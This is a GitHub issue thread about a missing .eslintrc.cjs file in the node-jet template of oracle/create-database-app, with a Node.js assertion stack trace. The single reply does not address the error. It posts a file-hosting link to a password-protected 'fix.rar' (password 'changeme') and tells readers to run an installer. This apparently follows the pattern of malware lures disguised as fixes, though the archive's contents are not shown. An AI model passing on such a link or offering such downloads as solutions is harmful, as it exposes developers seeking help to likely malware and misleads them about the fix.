### ISSUE TITLE
Error when generating app using the node-jet template

### ISSUE THREAD

**Issue by dbtools-antcampo** [oracle/create-database-app#91]
```
Generating database app...
✖ An error occured while running database-app#writing
node:internal/process/promises:289
            triggerUncaughtException(err, true /* fromPromise */);
            ^

AssertionError [ERR_ASSERTION]: Trying to copy from a source that does not exist: .npm/_npx/5f68cd048ba0fb01/node_modules/@oracle/create-database-app/templates/node-jet/.eslintrc.cjs
    at exports.copy (.npm/_npx/5f68cd048ba0fb01/node_modules/@oracle/create-database-app/node_modules/mem-fs-editor/lib/actions/copy.js:67:3)
    at default.writing (.npm/_npx/5f68cd048ba0fb01/node_modules/@oracle/create-database-app/dist/generators/index.js:84:17) {
  generatedMessage: false,
  code: 'ERR_ASSERTION',
  actual: false,
  expected: true,
  operator: '=='
}

```

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
